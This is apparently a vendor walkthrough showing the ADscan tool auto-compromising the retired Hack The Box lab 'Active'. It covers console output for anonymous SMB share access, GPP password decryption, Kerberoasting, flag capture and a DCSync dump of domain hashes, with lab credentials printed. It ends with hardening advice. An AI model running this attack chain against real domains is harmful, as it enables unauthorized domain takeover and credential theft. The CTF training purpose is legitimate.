⚡ Active - Auto-Pwn Walkthrough
Automatically compromise HTB Active using ADscan through GPP password exploitation and Kerberoasting
1
Setup2
Configure3
Scan4
Enumerate5
EscalateLab Information
🟢Easy⏱️~3 min🔑GPP Passwords🎫Kerberoasting
- Platform: Hack The Box
- Machine: Active (Retired)
- Difficulty: Easy
- OS: Windows Server 2008 R2
- Domain: active.htb
Prerequisites
If this is your first time using ADscan:
- Follow the Getting Started guide to install ADscan.
- Run
adscan installto pull the ADscan runtime image.
Before starting this lab, verify your environment (recommended):
adscan check
adscan install # if the check reports missing images or Docker issuesEnsure you also have:
- An active VPN connection to the HTB network
- The correct VPN interface up (typically
tun0)
Attack Overview
Active is vulnerable to:
- SMB Anonymous Access - Enumerate SYSVOL share without credentials
- GPP Password Extraction - Decrypt Group Policy Preferences passwords
- Kerberoasting - Extract and crack Administrator TGS ticket
- Pass-the-Hash - Gain Domain Admin access
Estimated time with ADscan: ~2-3 minutes (automatic mode)
Walkthrough
Step 1: Workspace Setup
Start ADscan and create a dedicated workspace for this lab:
adscan startIf this is your first run (no workspaces yet), ADscan will prompt you to create one.
⚠ No workspaces detected.
Enter name for a new workspace: : active
✓ Workspace 'active' created
ℹ Loading workspace data from: ~/.adscan/workspaces/active
ℹ Variables loaded from ~/.adscan/workspaces/active/variables.json
✓ Workspace data successfully processed for ~/.adscan/workspaces/active
✓ Workspace 'active' selected automatically as it's the only one.Step 2: Configure Target
Set the scan parameters for Active:
(ADscan:active ~/.adscan/workspaces/active) > set hosts 10.10.10.100
(ADscan:active ~/.adscan/workspaces/active) > set iface tun0
(ADscan:active ~/.adscan/workspaces/active) > set auto true ✓ Hosts configured: 10.10.10.100
✓ Interface configured: tun0 with IP: 10.10.14.X
✓ Auto mode configured: TrueScope: This lab is built around classic Active Directory misconfigurations (GPP passwords + Kerberoasting). Once you can reach the Active domain controller over the HTB VPN, ADscan LITE automates the rest of the AD kill chain: discovery → initial access → Kerberoast → Domain Admin → DCSync.
For CTF machines where most of the work is web, reversing, or other non-AD puzzles before AD is exposed, see Labs Scope & Coverage to understand how to combine manual steps with ADscan.
Step 3: Start Unauthenticated Scan
Launch the initial unauthenticated enumeration:
(ADscan:active ~/.adscan/workspaces/active) > start_unauthSecurity Misconfiguration: Active rejects null sessions but allows guest access to the Replication share, which contains SYSVOL data with GPP passwords. This enables password extraction without credentials.
ℹ Starting host detection on 10.10.10.100...
ℹ Starting smb scan
⚠ New domain found: active.htb
ℹ Updating DNS
✓ DNS resolution configured correctly for active.htb
✓ smb scan finished.
ℹ Checking for null sessions on SMB on the domain active.htb
✗ null sessions not accepted for domain active.htb.
ℹ Checking RID cycling for guest session
✗ Could not obtain usernames through RID cycling with a guest session on domain active.htb.
ℹ Checking shares access with a null session on domain active.htb
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ SMB Shares discovered on active.htb (null │
│ session) │
│ │
│ Host Share Permission │
│ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ │
│ 10.129.3.84 Replication READ │
│ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
Do you want to search for juicy information in the shares in domain active.htb with a null session (⚠ WARNING: This will be really noisy and will saturate the network in big domains)? [y/n] (y): y
ℹ Searching for interesting file extensions in the shares of domain active.htb. This might take a while, please be patient
✗ No files found
ℹ Searching for possible passwords in the shares of domain active.htb. This might take a while, please be patient
ℹ Log saved in smb/spidering_passw.log
✓ Credentials found in shares:
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ DOC_CREDENTIALS (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZG... │ 96.94% │ 14 │ │
│ └──────┴────────────────────────────────────────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
✓ Credentials saved to smb/spidering/ directory:
ℹ - DOC_CREDENTIALS: smb/spidering/doc_credentials.json
ℹ Detected potential Group Policy cpassword in share results. Decrypting and storing it instead of using it for password spraying.
✓ cpassword found (smb/spidering_passw.log:14): edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
ℹ Decrypting the password with gpp-decrypt
✓ Username: SVC_TGS
✓ Password: GPPstillStandingStrong2k18
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for [email protected]What's happening:
- ADscan detects domain active.htb and configures DNS resolution
- Null sessions are rejected for RPC, but a null session is accepted on the SMB share
- RID cycling fails, so ADscan tries share enumeration instead
- Replication share found with READ access (contains SYSVOL data)
- ADscan searches for sensitive files in the share
- Groups.xml discovered with encrypted GPP password (cpassword attribute)
- Microsoft's published AES-256 key used for decryption
- Result: Initial credentials obtained:
SVC_TGS:GPPstillStandingStrong2k18
Initial Access Achieved! Credentials obtained: SVC_TGS:GPPstillStandingStrong2k18
Step 4: Authenticated Enumeration (Automatic)
ADscan pivots with SVC_TGS credentials and performs comprehensive domain enumeration:
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for [email protected]
ℹ Starting authenticated enumeration for 'active.htb' domain.
ℹ BloodHound data collection for active.htb is starting
⚠ Could not establish LDAPS connection on domain active.htb. Retrying with LDAP...
✓ BloodHound collector executed successfully on the domain active.htb using LDAP.
ℹ Launching BloodHound CE suite...
✓ BloodHound CE is ready! Access at: http://localhost:8442/ui/login
ℹ Uploading ZIP file to BloodHound CE automatically
ℹ Searching for enabled computers on domain active.htb
1 Enabled Computers found
╭───────┬───────────────────╮
│ Index │ Enabled Computers │
├───────┼───────────────────┤
│ 1 │ dc.active.htb │
╰───────┴───────────────────╯
ℹ Creating a list of all enabled users for domain active.htb
2 Enabled Users found
╭───────┬───────────────╮
│ Index │ Enabled Users │
├───────┼───────────────┤
│ 1 │ SVC_TGS │
│ 2 │ Administrator │
╰───────┴───────────────╯
ℹ Searching for AS-REP roastable users in domain active.htb
✗ No asreproastable users found in domain active.htb
ℹ Searching for kerberoastable users in domain active.htb
╭──────────────────────────────────────────────────────────────────────────────╮
│ Kerberoastable Users in active.htb (Authenticated) │
│ ╭─────────────────────────────────────────┬──────────────────────────────╮ │
│ │ User │ Privileges │ │
│ ├─────────────────────────────────────────┼──────────────────────────────┤ │
│ │ Administrator │ Administrator │ │
│ ╰─────────────────────────────────────────┴──────────────────────────────╯ │
╰──────────────────────────────────────────────────────────────────────────────╯What's happening:
- ADscan authenticates as SVC_TGS and obtains a Kerberos TGT
- Runs BloodHound data collection for privilege escalation path discovery
- Enumerates all enabled users and computers in the domain
- Tests for AS-REP roastable users (none found)
- Critical finding: Administrator account is Kerberoastable (has SPN set)
- This allows extracting the Administrator TGS ticket for offline cracking
Technical detail: Accounts with SPNs can be Kerberoasted. Any authenticated user can request TGS tickets encrypted with the account's password, enabling offline cracking.
Step 5: Privilege Escalation (Automatic)
ADscan automatically performs Kerberoasting attack and cracks the Administrator password:
ℹ Using rockyou as the default wordlist.
⚠ Cracking kerberoast hashes. Please be patient (this may take a while)
╭──────────────────────────────── Hash Cracked ────────────────────────────────╮
│ 🔓 Cracked Credentials │
│ ╭───────────────┬──────────────────╮ │
│ │ Username │ Password │ │
│ ├───────────────┼──────────────────┤ │
│ │ Administrator │ Ticketmaster1968 │ │
│ ╰───────────────┴──────────────────╯ │
╰──────────────────────────────────────────────────────────────────────────────╯
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for [email protected]
⚠ The user administrator is in the privileged list of domain active.htb
⚠ User administrator has elevated privileges in the domain (adminCount=1).
⚠ The user administrator is a member of the Domain Admins groupWhat's happening:
- ADscan uses hashcat to crack the Kerberoast hash against rockyou wordlist
- Administrator password cracked:
Ticketmaster1968 - New Kerberos TGT obtained with Administrator credentials
- ADscan detects the account has Domain Admin privileges
- Result: Complete Domain Admin access achieved
Domain Admin Access Achieved! With Administrator credentials, we have complete control over the domain.
5.1 Automatic Flag Capture
ADscan uses Administrator credentials to automatically retrieve both flags:
ℹ Obtaining flags from domain active.htb
⚠ atexec method failed. Changing to wmiexec and retrying.
Flags in domain active.htb
╭──────┬─────────────────────────────────────────┬──────────────────────────────────╮
│ Type │ Path │ Flag │
├──────┼─────────────────────────────────────────┼──────────────────────────────────┤
│ user │ C:\Users\SVC_TGS\Desktop\user.txt │ adb87382372a50***************** │
│ root │ C:\Users\Administrator\Desktop\root.txt │ f9f87d5730777d***************** │
╰──────┴─────────────────────────────────────────┴──────────────────────────────────╯
ℹ User flag saved to: /root/.adscan/workspaces/active/flags/user.txt
ℹ Root flag saved to: /root/.adscan/workspaces/active/flags/root.txtMachine Owned! Both flags captured in approximately 1.5 minutes.
5.2 Complete Credential Dump (DCSync)
After capturing flags, ADscan performs a complete DCSync to dump all domain credentials:
Do you want to perform a DCSync in domain active.htb? [y/n]: y
Specify the user to extract NTLM hashes from (type 'All' for all users) (Administrator): All
ℹ Performing DCSync for all users
✓ Found credential: active.htb/Administrator with hash 5ffb4aaaf9b63dc519eca04aec0e8bed
⚠ Hash cracked for user 'Administrator'. Password preview: Ti************68
🔒 Upgrade to PRO to view and save the full password.
✓ Found credential: active.htb/krbtgt with hash b889e0d47d6fe22c8f0463a717f460dc
✓ Found credential: active.htb/SVC_TGS with hash f54f3a1d3c38140684ff4dad029f25b5
✓ DCSync completed successfully. ℹ Extracted 3 domain credentials.
Extracted credentials for domain active.htb
╭───────────────┬──────────────────────────────────╮
│ User │ Credential │
├───────────────┼──────────────────────────────────┤
│ Administrator │ Ti************68 │
│ krbtgt │ b889e0d47d6fe22c8f0463a717f460dc │
│ SVC_TGS │ f54f3a1d3c38140684ff4dad029f25b5 │
╰───────────────┴──────────────────────────────────╯Extracted credential set:
- 3 total credentials - All domain accounts extracted
- Administrator - Domain Admin hash + cracked password preview (PRO shows full)
- krbtgt - Domain controller Kerberos service account hash
- SVC_TGS - Service account hash (password already known from GPP)
Full Domain Compromise Complete! ADscan has automatically:
- Gained initial access via GPP password extraction
- Escalated privileges through Kerberoasting
- Achieved Domain Admin via Administrator credentials
- Captured both user and root flags
- Dumped all 3 domain account credentials via DCSync
Total time: ~2-3 minutes in automatic mode
Attack Chain Breakdown
Vulnerability: Anonymous access to SYSVOL share containing Group Policy files.
ADscan automation:
- Attempts SMB null session
- Enumerates accessible shares
- Identifies SYSVOL with read permissions
- Recursively searches for GPP XML files
- Locates Groups.xml with encrypted passwords
Discovery: \\active.htb\SYSVOL\active.htb\Policies\{...}\MACHINE\Preferences\Groups\Groups.xml
Vulnerability: Microsoft published the AES-256 key used to encrypt GPP passwords (MS14-025).
Technical details:
- Group Policy Preferences allow setting local admin passwords
- Passwords stored in SYSVOL XML files with "cpassword" attribute
- Microsoft published decryption key in MSDN documentation
- Any domain user can decrypt these passwords
ADscan automation:
- Parses Groups.xml file
- Extracts cpassword attribute
- Decrypts using published AES key
- Validates username/password combination
Discovery: SVC_TGS:GPPstillStandingStrong2k18
Vulnerability: Administrator account configured with Service Principal Name (SPN).
Technical details:
- Accounts with SPNs can be Kerberoasted
- Any authenticated user can request TGS tickets
- TGS tickets encrypted with account's password hash
- Offline cracking of TGS reveals plaintext password
ADscan automation:
- Enumerates accounts with SPNs (GetUserSPNs)
- Identifies Administrator with active/CIFS SPN
- Requests TGS ticket for the service
- Extracts TGS hash from ticket
- Cracks hash using configured wordlists
Discovery: Administrator:Ticketmaster1968
Result:
- Full Domain Admin privileges via Administrator credentials
- Complete control over Active Directory
- All domain credentials accessible
- User and root flags captured
Timing Breakdown
Automatic mode (set auto True):
- Unauthenticated scan + SMB enum: ~20–30 seconds
- GPP password decryption: ~5 seconds
- Authenticated enumeration: ~15–20 seconds
- Kerberoasting + cracking: ~45–60 seconds
- Privilege escalation + flag capture: ~15–20 seconds
- Total (observed): ~1.5 minutes end‑to‑end
Manual time: 15–30 minutes | ADscan time: ~1.5 minutes
Troubleshooting
SMB access denied
Verify anonymous access is allowed:
smbclient -N -L //10.10.10.100
# Should list shares without credentialsGPP file not found
Manually search SYSVOL:
# ADscan searches recursively
# Check if SYSVOL/Replication share is accessibleKerberoasting hash won't crack
Try alternative wordlists:
# Administrator password may not be in rockyou.txtClock skew errors
Synchronize time with target DC:
sudo ntpdate 10.10.10.100
# Kerberos requires time sync within 5 minutesKey Learning Points
What ADscan Automated
- Reconnaissance: SMB share enumeration via null session
- Initial Access: GPP password extraction and decryption
- Post-Compromise: Domain enumeration and SPN discovery
- Privilege Escalation: Kerberoasting and TGS cracking
- Post-Exploitation: Complete domain credential dump
Security Lessons
- GPP passwords: Microsoft deprecated GPP passwords in MS14-025 but legacy policies may exist
- SYSVOL hardening: Restrict anonymous access to SYSVOL share
- SPN auditing: Administrator and privileged accounts should not have SPNs
- Password policy: Weak passwords enable fast Kerberoasting cracking
🧪 HTB Active Directory Labs (Auto-Pwn Benchmarks)
Auto-pwn retired HTB AD machines in 2–5 minutes with ADscan LITE. Use these walkthroughs to learn real attack chains and compare manual vs automated timings.
🌲 Forest - Auto-Pwn Walkthrough
Automatically compromise HTB Forest using ADscan through AS-REP Roasting and Exchange Permissions abuse